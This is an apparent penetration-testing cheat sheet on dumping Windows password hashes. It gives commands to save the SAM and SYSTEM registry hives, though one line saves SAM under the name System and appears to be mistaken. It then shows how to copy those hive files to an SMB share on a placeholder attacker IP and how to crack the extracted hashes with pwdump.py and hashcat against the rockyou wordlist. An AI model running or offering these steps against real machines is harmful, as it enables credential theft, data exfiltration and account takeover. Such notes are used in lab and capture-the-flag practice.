# Powershell

## HashDump
```sh
save HKLM\SAM C:\Users\Administrator\Desktop\SAM
save HKLM\SAM C:\Users\Administrator\Desktop\System
```
* Use `samdump2`

## Extract Hashes
* Extract via smb server on attacker
```
copy C:\Windows\Repair\SAM \\<attacker-IP>\dir\
copy C:\Windows\Repair\SYSTEM \\<attacker-IP>\dir\
```
* Crack via [creddump7](git clone https://github.com/Tib3rius/creddump7)
```
python pwdump.py SYSTEM SAM
```
or
```
hashcat -m 1000 --force <hash> /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
```